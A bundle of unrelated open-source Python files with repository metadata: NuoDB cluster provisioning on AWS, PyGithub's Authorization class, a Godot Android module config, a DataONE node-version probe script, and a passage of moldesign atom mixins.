chef_data = {"nuodb": {"is_broker": True, "enableAutomation": True, "enableAutomationBootstrap": True, "autoconsole": {"brokers": ["localhost"]}, "webconsole": {"brokers": ["localhost"]}}}
#self.db['customers'][self.cluster_name]['brokers'] = [agent_addr]
self.db['customers'][self.cluster_name]['zones'][zone]['brokers'] =[agent_addr]
elif len(self.db['customers'][self.cluster_name]['zones'][zone]['brokers']) < int(self.brokers_per_zone):
isBroker = True
chef_data = {"nuodb": {"is_broker": True, "enableAutomation": True, "enableAutomationBootstrap": False, "autoconsole": {"brokers": ["localhost"]}, "webconsole": {"brokers": ["localhost"]}}}
#self.db['customers'][self.cluster_name]['brokers'].append(agent_addr)
self.db['customers'][self.cluster_name]['zones'][zone]['brokers'].append(agent_addr)
else:
isBroker = False
chef_data = {"nuodb": {"is_broker": False, "enableAutomation": True, "enableAutomationBootstrap": False}}
#common Chef information
chef_data["run_list"] = ["recipe[nuodb]"]
chef_data['nuodb']["port"] = agentPort
chef_data['nuodb']["portRange"] = subPortRange
chef_data["nuodb"]['automationTemplate'] = "Minimally Redundant"
chef_data["nuodb"]['altAddr'] = "" # Populate this at boot time
chef_data["nuodb"]['region'] = zone
if self.alert_email != None and "@" in self.alert_email:
chef_data["nuodb"]['monitoring'] = {"enable": True, "alert_email": self.alert_email}
else:
chef_data["nuodb"]['monitoring'] = {"enable": False, "alert_email": ""}
chef_data['nuodb']['license'] = self.nuodb_license
chef_data["nuodb"]['domain_name'] = self.domain_name
chef_data["nuodb"]['domain_password'] = self.domain_password
if nuodb_rpm_url != None:
chef_data["nuodb"]["download_url"] = nuodb_rpm_url
chef_data["nuodb"]["start_services"] = start_services
stub[host]['chef_data'] = chef_data
else:
isBroker = stub[host]['chef_data']['nuodb']['is_broker']
stub[host]['ami'] = ami
stub[host]['security_group_ids'] = security_group_ids
stub[host]['subnet'] = subnets[len(stub) % len(subnets)]
stub[host]['obj'] = nuodbTools.aws.Host(host, ec2Connection=self.zones[zone].connection,
Route53Connection=self.route53, dns_domain=self.dns_domain,
domain = self.domain_name, domainPassword = self.domain_password,
advertiseAlt = True, region = zone,
agentPort = agentPort, portRange = subPortRange,
isBroker = isBroker, ssh_key = self.ssh_key, ssh_keyfile = self.ssh_keyfile)
return host
def __boot_host(self, host, zone, instance_type = None, wait_for_health = False, ebs_optimized = False):
if instance_type == None:
instance_type = self.instance_type
stub = self.db['customers'][self.cluster_name]['zones'][zone]['hosts'][host]
template_vars = dict(
hostname = host,
chef_json = json.dumps(stub['chef_data']),
email_address = self.alert_email
)
f = open("/".join([os.path.dirname(os.path.abspath(inspect.stack()[0][1])), "templates", "init.py"]))
template = string.Template(f.read())
f.close()
userdata = template.substitute(template_vars)
obj = stub['obj'].create(ami=stub['ami'], instance_type=instance_type, security_group_ids=stub['security_group_ids'], subnet = stub['subnet'], getPublicAddress = True, userdata = userdata, ebs_optimized=ebs_optimized)
print ("Waiting for %s to start" % obj.name),
if obj.status() != "running":
print("."),
time.sleep(30) #Wait 30 seconds in between node starts
print
obj.update_data()
if not self.dns_emulate:
print "Setting DNS for %s " % obj.name
obj.dns_set()
if wait_for_health:
healthy = False
count = 0
tries = 60
wait = 10
print "Waiting for agent on %s (%s)" % (obj.name, obj.ext_ip)
while not healthy or count == tries:
if obj.agent_running():
healthy = True
else:
print("."),
time.sleep(wait)
count += 1
if not healthy:
print "Cannot reach agent on %s after %s seconds. Check firewalls and the host for errors." % (obj.name, str(tries * wait))
exit(1)
print
else:
print "Not waiting for agent on %s, node will come up asynchronously." % obj.name
return obj
def connect_zone(self, zone):
self.zones[zone] = nuodbTools.aws.Zone(zone)
self.zones[zone].connect(aws_access_key=self.aws_access_key, aws_secret=self.aws_secret)
if "customers" not in self.db:
self.db['customers'] = {}
if self.cluster_name not in self.db['customers']:
self.db['customers'][self.cluster_name] = {"zones": {}, "brokers": []}
if zone not in self.db['customers'][self.cluster_name]['zones']:
self.db['customers'][self.cluster_name]['zones'][zone] = {"hosts": {}, "brokers": []}
def create_cluster(self, ebs_optimized = False):
for host in self.get_hosts():
obj = self.get_host(host)['obj']
zone = obj.region
wait_for_health = False
if obj.isBroker == True:
# If this node is a broker, then pair it with brokers outside its region if you can
wait_for_health = True
brokers = []
for idx, azone in enumerate(self.get_zones()):
if azone != zone:
for broker in self.db['customers'][self.cluster_name]['zones'][azone]['brokers']:
brokers.append(broker)
if len(brokers) == 0:
# There are no other brokers in other regions found. Add another peer in this region if there is one
brokers = self.db['customers'][self.cluster_name]['zones'][zone]['brokers']
else:
#If this node isn't a broker pair it with local zone brokers
brokers = self.db['customers'][self.cluster_name]['zones'][zone]['brokers']
print "%s: Setting peers to [%s]" % (host, ",".join(brokers))
self.db['customers'][self.cluster_name]['zones'][zone]['hosts'][host]['chef_data']['nuodb']['brokers'] = brokers
self.db['customers'][self.cluster_name]['zones'][zone]['hosts'][host]['chef_data']['nuodb']['autoconsole'] = {"brokers": brokers}
self.db['customers'][self.cluster_name]['zones'][zone]['hosts'][host]['chef_data']['nuodb']['webconsole']= {"brokers": brokers}
self.__boot_host(host, zone, wait_for_health = wait_for_health, ebs_optimized = ebs_optimized)
if self.dns_emulate:
self.set_dns_emulation()
def delete_db(self):
self.exit()
if os.path.exists(self.database_file):
os.remove(self.database_file)
def delete_dns(self, zone = None):
if zone == None:
zones = self.get_zones()
else:
zones = [zone]
for zone in zones:
hosts = self.get_hosts(zone=zone)
for host in hosts:
host_obj = self.get_host(host)['obj']
host_obj.dns_delete()
def dump_db(self):
return self.db
def get_brokers(self):
try:
brokers = []
for zone in self.get_zones():
for broker in self.db['customers'][self.cluster_name]['zones'][zone]['brokers']:
if self.dns_emulate:
brokers.append(self.get_host(broker)['obj'].ext_ip)
else:
brokers.append(broker)
return brokers
except:
return []
def get_host(self, host_id):
split= host_id.split(".")
customer = split[1]
zone = split[2]
if host_id in self.db['customers'][customer]['zones'][zone]['hosts']:
return self.db['customers'][customer]['zones'][zone]['hosts'][host_id]
else:
raise Error("No host found with id of '%s'" % host_id)
def get_host_address(self, host_id):
split= host_id.split(".")
customer = split[1]
zone = split[2]
if host_id in self.db['customers'][customer]['zones'][zone]['hosts']:
if self.dns_emulate:
return self.db['customers'][customer]['zones'][zone]['hosts'][host_id]['obj'].ext_ip
else:
return self.db['customers'][customer]['zones'][zone]['hosts'][host_id]['obj'].name
else:
raise Error("No host found with id of '%s'" % host_id)
def get_hosts(self, zone = None):
hosts = []
if zone == None:
zones = self.get_zones()
else:
zones=[zone]
for zone in zones:
for host in self.db['customers'][self.cluster_name]['zones'][zone]['hosts']:
hosts.append(host)
return sorted(hosts)
def get_zones(self):
zones = []
for zone in self.db['customers'][self.cluster_name]['zones']:
zones.append(zone)
return sorted(zones)
def set_dns_emulation(self):
host_list = []
for host_id in self.get_hosts():
host = self.get_host(host_id)['obj']
host.update_data()
print("Waiting for an IP for %s" % host.name),
while host.ext_ip == None or len(host.ext_ip) == 0:
print ("."),
time.sleep(5)
host.update_data()
print("got %s" % host.ext_ip)
host_list.append([host.name, host.ext_ip])
for host_id in self.get_hosts():
host = self.get_host(host_id)
obj = host['obj']
print ("Waiting for ssh on %s." % obj.name),
count = 60
while not obj.is_port_available(22) and count >= 0:
print ("."),
time.sleep(5)
count -= 1
print
if count == 0:
print "ERROR: Gave up on %s after %d seconds because it could not be contacted. This server may not work properly." % (obj.name, 60*5)
else:
print ("Setting /etc/hosts on %s..." % obj.name)
command = "cat /etc/hosts"
(rc, etc_hosts_before, stderr) = obj.execute_command(command)
for line in host_list:
hostname = line[0]
ip = line[1]
command = "sudo awk -v s=\"%s %s\" '/%s/{f=1;$0=s}7;END{if(!f)print s}' /etc/hosts > /tmp/hosts && sudo chown root:root /tmp/hosts && sudo chmod 644 /tmp/hosts && sudo mv /tmp/hosts /etc/hosts" % (ip, hostname, hostname)
(rc, stdout, stderr) = obj.execute_command(command)
if rc != 0:
print "Unable to set DNS emulation for %s: %s" % (obj.name, stderr)
command = "cat /etc/hosts"
(rc, etc_hosts_after, stderr) = obj.execute_command(command)
if host['chef_data']['nuodb']['start_services'] and etc_hosts_before != etc_hosts_after:
print "Restarting services..."
count = 5
ok = False
while count != 0 and not ok:
try:
obj.agent_action(action = "restart")
ok=True
except:
time.sleep(5)
count -= 1
if count == 0:
raise
count = 5
ok = False
while count != 0 and not ok:
try:
obj.webconsole_action(action = "restart")
ok=True
except:
time.sleep(5)
count -= 1
if count == 0:
raise
count = 5
ok = False
while count != 0 and not ok:
try:
obj.autoconsole_action(action = "restart")
ok=True
except:
time.sleep(5)
count -= 1
if count == 0:
raise
def terminate_hosts(self, zone = None):
if zone == None:
zones = self.get_zones()
else:
zones = [zone]
for zone in zones:
hosts = self.get_hosts(zone=zone)
for host in hosts:
host_obj = self.get_host(host)['obj']
if host_obj.exists:
print "Terminating %s" % host
host_obj.terminate()
del self.db['customers'][self.cluster_name]['zones'][zone]['hosts'][host_obj.name]
for idx, broker in enumerate(self.db['customers'][self.cluster_name]['brokers']):
if zone in broker:
del self.db['customers'][self.cluster_name]['brokers'][idx]
class Error(Exception):
pass
class Unbuffered(object):
def __init__(self, stream):
self.stream = stream
def write(self, data):
self.stream.write(data)
self.stream.flush()
def __getattr__(self, attr):
return getattr(self.stream, attr)
|
{
"content_hash": "6c6fe9f38002ab5e19fe141efbff9326",
"timestamp": "",
"source": "github",
"line_count": 372,
"max_line_length": 235,
"avg_line_length": 43.27150537634409,
"alnum_prop": 0.5496676399329068,
"repo_name": "nuodb/nuodbTools",
"id": "4c30234356a4113c49d39887ae04040a38838d25",
"size": "16097",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nuodbTools/cluster/cluster.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "175017"
}
],
"symlink_target": ""
}
|
import github.GithubObject
import github.AuthorizationApplication
class Authorization(github.GithubObject.CompletableGithubObject):
"""
This class represents Authorizations as returned for example by http://developer.github.com/v3/todo
"""
@property
def app(self):
"""
:type: :class:`github.AuthorizationApplication.AuthorizationApplication`
"""
self._completeIfNotSet(self._app)
return self._app.value
@property
def created_at(self):
"""
:type: datetime.datetime
"""
self._completeIfNotSet(self._created_at)
return self._created_at.value
@property
def id(self):
"""
:type: integer
"""
self._completeIfNotSet(self._id)
return self._id.value
@property
def note(self):
"""
:type: string
"""
self._completeIfNotSet(self._note)
return self._note.value
@property
def note_url(self):
"""
:type: string
"""
self._completeIfNotSet(self._note_url)
return self._note_url.value
@property
def scopes(self):
"""
:type: list of string
"""
self._completeIfNotSet(self._scopes)
return self._scopes.value
@property
def token(self):
"""
:type: string
"""
self._completeIfNotSet(self._token)
return self._token.value
@property
def updated_at(self):
"""
:type: datetime.datetime
"""
self._completeIfNotSet(self._updated_at)
return self._updated_at.value
@property
def url(self):
"""
:type: string
"""
self._completeIfNotSet(self._url)
return self._url.value
def delete(self):
"""
:calls: `DELETE /authorizations/:id <http://developer.github.com/v3/oauth>`_
:rtype: None
"""
headers, data = self._requester.requestJsonAndCheck(
"DELETE",
self.url
)
def edit(self, scopes=github.GithubObject.NotSet, add_scopes=github.GithubObject.NotSet, remove_scopes=github.GithubObject.NotSet, note=github.GithubObject.NotSet, note_url=github.GithubObject.NotSet):
"""
:calls: `PATCH /authorizations/:id <http://developer.github.com/v3/oauth>`_
:param scopes: list of string
:param add_scopes: list of string
:param remove_scopes: list of string
:param note: string
:param note_url: string
:rtype: None
"""
assert scopes is github.GithubObject.NotSet or all(isinstance(element, (str, unicode)) for element in scopes), scopes
assert add_scopes is github.GithubObject.NotSet or all(isinstance(element, (str, unicode)) for element in add_scopes), add_scopes
assert remove_scopes is github.GithubObject.NotSet or all(isinstance(element, (str, unicode)) for element in remove_scopes), remove_scopes
assert note is github.GithubObject.NotSet or isinstance(note, (str, unicode)), note
assert note_url is github.GithubObject.NotSet or isinstance(note_url, (str, unicode)), note_url
post_parameters = dict()
if scopes is not github.GithubObject.NotSet:
post_parameters["scopes"] = scopes
if add_scopes is not github.GithubObject.NotSet:
post_parameters["add_scopes"] = add_scopes
if remove_scopes is not github.GithubObject.NotSet:
post_parameters["remove_scopes"] = remove_scopes
if note is not github.GithubObject.NotSet:
post_parameters["note"] = note
if note_url is not github.GithubObject.NotSet:
post_parameters["note_url"] = note_url
headers, data = self._requester.requestJsonAndCheck(
"PATCH",
self.url,
input=post_parameters
)
self._useAttributes(data)
def _initAttributes(self):
self._app = github.GithubObject.NotSet
self._created_at = github.GithubObject.NotSet
self._id = github.GithubObject.NotSet
self._note = github.GithubObject.NotSet
self._note_url = github.GithubObject.NotSet
self._scopes = github.GithubObject.NotSet
self._token = github.GithubObject.NotSet
self._updated_at = github.GithubObject.NotSet
self._url = github.GithubObject.NotSet
def _useAttributes(self, attributes):
if "app" in attributes: # pragma no branch
self._app = self._makeClassAttribute(github.AuthorizationApplication.AuthorizationApplication, attributes["app"])
if "created_at" in attributes: # pragma no branch
self._created_at = self._makeDatetimeAttribute(attributes["created_at"])
if "id" in attributes: # pragma no branch
self._id = self._makeIntAttribute(attributes["id"])
if "note" in attributes: # pragma no branch
self._note = self._makeStringAttribute(attributes["note"])
if "note_url" in attributes: # pragma no branch
self._note_url = self._makeStringAttribute(attributes["note_url"])
if "scopes" in attributes: # pragma no branch
self._scopes = self._makeListOfStringsAttribute(attributes["scopes"])
if "token" in attributes: # pragma no branch
self._token = self._makeStringAttribute(attributes["token"])
if "updated_at" in attributes: # pragma no branch
self._updated_at = self._makeDatetimeAttribute(attributes["updated_at"])
if "url" in attributes: # pragma no branch
self._url = self._makeStringAttribute(attributes["url"])
|
{
"content_hash": "86b69127ffb447e4fbeb99dcc78ef1a7",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 205,
"avg_line_length": 36.67741935483871,
"alnum_prop": 0.6197009674582233,
"repo_name": "ARMmbed/yotta_osx_installer",
"id": "b1ff7314d419bc7ace04f0b92f17c38f7319db59",
"size": "7574",
"binary": false,
"copies": "71",
"ref": "refs/heads/master",
"path": "workspace/lib/python2.7/site-packages/github/Authorization.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "ActionScript",
"bytes": "46"
},
{
"name": "Assembly",
"bytes": "29493"
},
{
"name": "Batchfile",
"bytes": "1321"
},
{
"name": "C",
"bytes": "3589917"
},
{
"name": "C++",
"bytes": "10603800"
},
{
"name": "CMake",
"bytes": "2408460"
},
{
"name": "CSS",
"bytes": "17863"
},
{
"name": "Emacs Lisp",
"bytes": "14305"
},
{
"name": "FORTRAN",
"bytes": "2105"
},
{
"name": "Groff",
"bytes": "3889491"
},
{
"name": "HTML",
"bytes": "31505361"
},
{
"name": "JavaScript",
"bytes": "90647"
},
{
"name": "Logos",
"bytes": "8877"
},
{
"name": "Makefile",
"bytes": "2798"
},
{
"name": "Objective-C",
"bytes": "254392"
},
{
"name": "Python",
"bytes": "7903768"
},
{
"name": "Shell",
"bytes": "36795"
},
{
"name": "VimL",
"bytes": "8478"
},
{
"name": "XC",
"bytes": "8384"
},
{
"name": "XS",
"bytes": "8334"
}
],
"symlink_target": ""
}
|
def can_build(plat):
return plat == 'android'
def configure(env):
if env['platform'] == 'android':
env.android_add_dependency("compile 'com.google.android.gms:play-services-plus:9.8.0'")
env.android_add_dependency("compile 'com.google.android.gms:play-services-drive:9.8.0'")
env.android_add_dependency("compile 'com.google.android.gms:play-services-games:9.8.0'")
env.android_add_java_dir("android")
env.android_add_to_manifest("android/AndroidManifestChunk.xml")
env.disable_module()
|
{
"content_hash": "3df9497cc07c941940e8541dfe59007a",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 96,
"avg_line_length": 49.36363636363637,
"alnum_prop": 0.6795580110497238,
"repo_name": "jlopezcur/GodotGooglePlayGameServices",
"id": "90a3a661f546c312e54e393868386ec43f541900",
"size": "543",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "gpgs/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "GDScript",
"bytes": "1257"
},
{
"name": "Java",
"bytes": "46248"
},
{
"name": "Python",
"bytes": "543"
}
],
"symlink_target": ""
}
|
"""Find the software stack and version for each MN in a DataONE environment.
The results are printed to stdout and written to a CSV file.
The MNs are checked concurrently, while checks are issued to each MN serially. This
gives each MN the most time to return something sensible but does end up slowing down
the script, since it ends up waiting until timeout for each check against dead nodes.
"""
import asyncio
import csv
import logging
import re
import ssl
import sys
import aiohttp
import bs4
import d1_scimeta.util
import d1_common.env
import d1_common.url
import d1_common.util
import d1_common.utils.ulog
import d1_common.wrap.simple_xml
import d1_client.cnclient_2_0
import d1_client.command_line
TIMEOUT_SECONDS = 30
RESULT_CSV_PATH = "./node_versions.csv"
# Max number of lines to log from unrecognized response body
MAX_RESPONSE_LINE_COUNT = 10
log = logging.getLogger(__name__)
def main():
"""Sync wrapper of main() for use by d1_util.setup() to generate console entry
points."""
sys.exit(asyncio.run(_main()))
async def _main():
parser = d1_client.command_line.D1ClientArgParser(__doc__)
parser.add_argument(
"csv_path",
nargs="?",
default=RESULT_CSV_PATH,
help="Save path for version information CSV file",
)
parser.add_argument(
"--max_response_lines",
"-m",
type=int,
default=MAX_RESPONSE_LINE_COUNT,
help="Max number of lines to log from unrecognized response body",
)
parser.add_argument(
"--only",
"-n",
nargs="*",
default=[],
metavar="regex",
help="Only check nodes with baseURL matching regex",
)
args = parser.parse_args()
d1_client.command_line.log_setup(args.debug)
args_dict = parser.get_method_args(args)
cn_base_url = args_dict["base_url"]
node_list_pyxb = get_node_list_pyxb(cn_base_url)
base_url_list = get_eligible_base_url_list(node_list_pyxb)
if args.only:
base_url_list = filter_by_rx_list(args.only, base_url_list)
log.info("Node count: {}".format(len(base_url_list)))
if not base_url_list:
return 1
log.info("Creating one type/version task per node")
task_set = set()
result_list = []
async with aiohttp.ClientSession(
timeout=aiohttp.ClientTimeout(total=TIMEOUT_SECONDS)
) as session:
for base_url in base_url_list:
log.info(f'Adding node. base_url="{base_url}"')
task_set.add(get_node_type_and_version(session, base_url))
log.info("Processing tasks")
while True:
done_set, task_set = await asyncio.wait(
task_set, return_when=asyncio.FIRST_COMPLETED
)
log.info("Task completed. Remaining tasks: {}".format(len(task_set)))
for task in done_set:
result_list.append(task.result())
if not task_set:
break
log.info("Saving results")
tidy_list = get_tidy_list(result_list)
print_result(tidy_list)
write_result_csv(RESULT_CSV_PATH, tidy_list)
log.info("Wrote result to: {}".format(RESULT_CSV_PATH))
async def get_node_type_and_version(session, base_url):
"""Try software stack type and version extraction algorithms on MN until one is
successful or all have been tried.
If none are successful, return the status code and response body from the last
failed attempt.
Args:
session: aiohttp.ClientSession
base_url: Member Node BaseURL
Returns:
If successful:
baseURL of recognized MN: str
type of MN: str ("GMN" or "Metacat")
software stack version: str
"""
gmn_version_str = await get_gmn_version(session, base_url)
if gmn_version_str:
return base_url, "GMN", gmn_version_str
if await is_v1_gmn(session, base_url):
return base_url, "GMN", "1.x.x"
metacat_version_str = await get_metacat_version(session, base_url)
if metacat_version_str:
return base_url, "Metacat", metacat_version_str
base_url, status_int, result_str = await check_api_endpoints(session, base_url)
log.debug("Received result: {}".format(base_url))
return base_url, status_int, result_str
async def get_gmn_version(session, base_url):
"""Get version number returned from /home by GMN 1.x / 2.x / 3.x.
Args:
session:
base_url (): The BaseURL of a node that may be a GMN instance.
Returns:
None: The node at base_url is not a functional GMN instance
str: The node at base_url is a functional GMN instance running the returned version.
"""
home_url = d1_common.url.joinPathElements(base_url, "home")
log.info("Checking for GMN: {}".format(base_url))
status, body_str = await get(session, home_url)
if status in (200, 401):
version_str = await get_gmn_1x_2x_version(body_str)
if version_str:
return version_str
version_str = await get_gmn_3x_version(body_str)
if version_str:
return version_str
dump_response_body("/home exists but returned unrecognized response", body_str)
async def get_gmn_1x_2x_version(html_str):
"""Get version number from HTML returned from /home by GMN 1.x / 2.x.
GMN 1.x / 2.x /home endpoint returns HTML which must be scraped for the version
number.
Args:
html_str: HTTP body that may be HTML returned from a GMN 1.x / 2.x instance.
Returns:
None: ``html_str`` is not valid HTML from a GMN 1.x / 2.x instance.
str: ``html_str`` is from a GMN 1.x / GMN 2.x instance running the returned
version.
"""
try:
soup = bs4.BeautifulSoup(html_str, "html.parser")
return soup.find(string="GMN version:").find_next("td").string
except AttributeError:
pass
async def get_gmn_3x_version(xml_str):
"""Get version number from XML returned from /home by GMN 3.x.
GMN 3.x /home endpoint returns well formed XML containing version numbers for
components in the stack.
Returns:
None: ``xml_str`` is not valid XML from a GMN 3.x instance.
str: ``xml_str`` is from a GMN 3.x instance running the returned version
XML fragment:
<value name="gmnVersion">3.4.2</value>
"""
try:
with d1_common.wrap.simple_xml.wrap(xml_str) as xml:
return xml.get_element_by_xpath('//value[@name="gmnVersion"]')[0].text
except (d1_common.wrap.simple_xml.SimpleXMLWrapperException, IndexError):
pass
async def is_v1_gmn(session, base_url):
"""Detect GMN v1 where version cannot be determined due to access restricted
ObjectList, 500 ServiceFailure or other issues.
Args:
session:
base_url: str
The BaseURL of a node that may be a GMN v1 instance.
Returns:
"""
status, body_str = await get(session, base_url)
return '<h3><font style="color:red">' in (body_str or "")
async def get_metacat_version(session, base_url):
"""
Args:
session:
base_url: The BaseURL of a node that may be a Metacat instance.
Returns:
None: The node at base_url is not a functional Metacat instance.
str: The node at base_url is a functional Metacat instance running the returned version.
"""
log.info("Checking for Metacat: {}".format(base_url))
metacat_version_url = base_url.strip("/d1/mn") + "/metacat?action=getversion"
status, body_str = await get(session, metacat_version_url)
if status == 200:
xml_tree = d1_scimeta.util.parse_xml_bytes(body_str.encode("utf-8"))
# d1_scimeta.util.dump_pretty_tree(xml_tree)
return xml_tree.getroot().text
async def check_api_endpoints(session, base_url):
"""Check for recognizable response from: v1/node, v2/node, v2/object, v1/object,
baseURL.
To maximize the chance of receiving a response, the endpoints are checked serially
instead of concurrently.
Endpoints are checked in the order listed. If valid response is received,
information about the successful request is returned and later endpoints are not
checked.
If no checks are successful, result from the last unsuccessful check is returned.
Note: The run time of the entire script will be pretty much equal to the timeout times
This function takes up the most time. It typically waits until timeout for
each of the checked endpoints.
"""
status_int = "?"
for check_str in "v1/node", "v2/node", "v2/object", "v1/object", "/":
api_url = d1_common.url.joinPathElements(base_url, check_str)
log.info("Checking unknown: {}".format(api_url))
status, body_str = await get(session, api_url)
if status in (200, 401):
break
return base_url, status_int, f"{check_str}={body_str}"
async def get(session, url):
"""Wrapper for session.get() that returns None if the HTTP GET call failed.
Args:
session:
url:
Returns:
2-tup
status_code: int
body_str: str
"""
try:
async with session.get(url, ssl=False) as response:
return response.status, await response.text()
except (
ssl.SSLError,
asyncio.TimeoutError,
ConnectionError,
aiohttp.ClientConnectorError,
):
return None, None
def filter_by_rx_list(rx_list, base_url_list):
filtered_base_url_set = set()
for rx in rx_list:
for base_url in base_url_list:
if re.search(rx, base_url):
if base_url not in filtered_base_url_set:
log.debug(f"Including node selected by regex: {rx}: {base_url}")
filtered_base_url_set.add(base_url)
return sorted(filtered_base_url_set)
def get_tidy_list(response_list):
def trim(v):
return " / ".join(str(v).splitlines())[:80]
return [
(trim(v[1]), trim(v[2]), trim(v[0]))
for v in sorted(response_list, key=lambda x: (str(x[1]), x[2], x[0]))
]
def print_result(tidy_list):
for row_list in tidy_list:
log.info("{:<10} {:<10} {}".format(row_list[0], row_list[1], row_list[2]))
def write_result_csv(result_csv_path, tidy_list):
with open(result_csv_path, "w") as csv_file:
csv_writer = csv.writer(csv_file, quoting=csv.QUOTE_MINIMAL)
csv_writer.writerow(
[
"node_type or status code",
"version or first line of unrecognized html body",
"base_url",
]
)
for row_list in tidy_list:
csv_writer.writerow(row_list)
def get_node_list_pyxb(cn_base_url):
client = d1_client.cnclient_2_0.CoordinatingNodeClient_2_0(cn_base_url)
return client.listNodes()
def get_eligible_base_url_list(node_list_pyxb):
eligible_base_url_list = []
for node_pyxb in node_list_pyxb.node:
if node_pyxb.type == "cn":
log.debug("Skipping CN: {}".format(node_pyxb.baseURL))
elif node_pyxb.state != "up":
log.debug(
f'Skipping node with state "{node_pyxb.state}": {node_pyxb.baseURL}'
)
else:
eligible_base_url_list.append(node_pyxb.baseURL)
return eligible_base_url_list
def dump_response_body(msg_str, body_str):
log.warning(f"{msg_str}:")
for i, line in enumerate(body_str.splitlines(keepends=False)):
if i == MAX_RESPONSE_LINE_COUNT:
log.warning(" <skipped rest of response body>")
break
log.warning(" {:>4} {}".format(i + 1, line))
if __name__ == "__main__":
sys.exit(main())
|
{
"content_hash": "53ffefd9a2025c57ebe01640fbcb41c3",
"timestamp": "",
"source": "github",
"line_count": 365,
"max_line_length": 96,
"avg_line_length": 32.013698630136986,
"alnum_prop": 0.6314933675652546,
"repo_name": "DataONEorg/d1_python",
"id": "ebcb7abb2817547b86eb4331e54d53d0ae06ba7c",
"size": "12497",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utilities/src/d1_util/find_node_versions.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "4798"
},
{
"name": "HTML",
"bytes": "13358"
},
{
"name": "Inno Setup",
"bytes": "3430"
},
{
"name": "JavaScript",
"bytes": "2068"
},
{
"name": "Python",
"bytes": "3547939"
},
{
"name": "Shell",
"bytes": "5670"
},
{
"name": "XSLT",
"bytes": "89205"
}
],
"symlink_target": ""
}
|
import numpy as np
import moldesign as mdt
from moldesign import data, utils
from moldesign import units as u
from . import toplevel, AtomContainer, AtomList, AtomArray, AtomCoordinate, Bond
class AtomDrawingMixin(object):
""" Functions for creating atomic visualizations.
Note:
This is a mixin class designed only to be mixed into the :class:`Atom` class. Routines
are separated are here for code organization only - they could be included in the main
Atom class without changing any functionality
"""
#@utils.args_from(mdt.molecule.Molecule.draw2d, allexcept=['highlight_atoms']) # import order
def draw2d(self, **kwargs):
""" Draw a 2D viewer with this atom highlighted (Jupyter only).
In biomolecules, only draws the atom's residue.
Args:
width (int): width of viewer in pixels
height (int): height of viewer in pixels
Returns:
mdt.ChemicalGraphViewer: viewer object
"""
if self.molecule:
if self.molecule.is_small_molecule:
return self.molecule.draw2d(highlight_atoms=[self], **kwargs)
elif self.molecule.is_biomolecule:
return self.residue.draw2d(highlight_atoms=[self], **kwargs)
else:
raise ValueError('No drawing routine specified')
else:
raise ValueError('No drawing routine specified')
#@utils.args_from(mdt.molecule.Molecule.draw2d, allexcept=['highlight_atoms']) # import order
def draw3d(self, **kwargs):
""" Draw a 3D viewer with this atom highlighted (Jupyter only).
Args:
width (int): width of viewer in pixels
height (int): height of viewer in pixels
Returns:
mdt.GeometryViewer: viewer object
"""
return self.molecule.draw3d(highlight_atoms=[self], **kwargs)
def draw(self, width=300, height=300):
""" Draw a 2D and 3D viewer with this atom highlighted (notebook only)
Args:
width (int): width of viewer in pixels
height (int): height of viewer in pixels
Returns:
ipy.HBox: viewer object
"""
import ipywidgets as ipy
viz2d = self.draw2d(width=width, height=height, display=False)
viz3d = self.draw3d(width=width, height=height, display=False)
return ipy.HBox([viz2d, viz3d])
class AtomGeometryMixin(object):
""" Functions measuring distances between atoms and other things.
Note:
This is a mixin class designed only to be mixed into the :class:`Atom` class. Routines
are separated are here for code organization only - they could be included in the main
Atom class without changing any functionality
"""
@utils.args_from(AtomContainer.distance)
def distance(self, *args, **kwargs):
return self._container.distance(*args, **kwargs)
@utils.args_from(AtomContainer.atoms_within)
def atoms_within(self, *args, **kwargs):
return self._container.atoms_within(*args, **kwargs)
@utils.args_from(AtomContainer.residues_within)
def residues_within(self, *args, **kwargs):
return self._container.residues_within(*args, **kwargs)
@utils.args_from(AtomContainer.calc_distance_array)
def calc_distances(self, *args, **kwargs):
array = self._container.calc_distance_array(*args, **kwargs)
return array[0]
@property
def _container(self):
""" AtomContainer: a container with just this atom in it.
This is a convenience method for accessing to all of the :class:`AtomContainer`'s
useful methods for dealing with geometry
"""
return AtomList([self])
class AtomPropertyMixin(object):
""" Functions accessing computed atomic properties.
Note:
This is a mixin class designed only to be mixed into the :class:`Atom` class. Routines
are separated are here for code organization only - they could be included in the main
Atom class without changing any functionality
"""
@property
def ff(self):
""" moldesign.utils.DotDict: This atom's force field parameters, if available (``None``
otherwise)
"""
try:
ff = self.molecule.energy_model.mdtforcefield
except AttributeError:
return None
if ff is None: return None
return utils.DotDict(partialcharge=ff.partial_charges[self],
lj=ff.lennard_jones[self])
@property
def basis_functions(self):
""" List[mdt.orbitals.AtomicBasisFunction]: This atom's basis functions, if available
(``None`` otherwise)
"""
if self.molecule is None:
return None
try:
wfn = self.molecule.wfn
except mdt.exceptions.NotCalculatedError:
return None
return wfn.aobasis.on_atom.get(self, [])
@property
def properties(self):
""" moldesign.utils.DotDict: Returns any calculated properties for this atom
"""
props = utils.DotDict()
for name, p in self.molecule.properties.iteritems():
if hasattr(p, 'type') and p.type == 'atomic':
props[name] = p[self]
return props
class AtomReprMixin(object):
""" Functions for printing out various strings related to the atom.
Note:
This is a mixin class designed only to be mixed into the :class:`Atom` class. Routines
are separated are here for code organization only - they could be included in the main
Atom class without changing any functionality
"""
def __str__(self):
desc = '%s %s (elem %s)' % (self.__class__.__name__, self.name, self.elem)
molstring = ''
if self.molecule:
molstring = ', index %d' % self.index
if self.molecule.is_biomolecule:
molstring += ' (res %s chain %s)' % (self.residue.name, self.chain.name)
return '%s%s' % (desc, molstring)
def _shortstr(self):
""" A shorter string representation for easier-to-read lists of atoms
"""
fields = [self.name]
if self.molecule:
fields.append('#%d' % self.index)
if self.molecule.is_biomolecule:
fields.append('in %s.%s' % (self.chain.name, self.residue.name))
return ' '.join(fields)
def __repr__(self):
try:
if self.molecule:
return '<%s in molecule %s>' % (self, self.molecule)
else:
return '<%s>' % self
except:
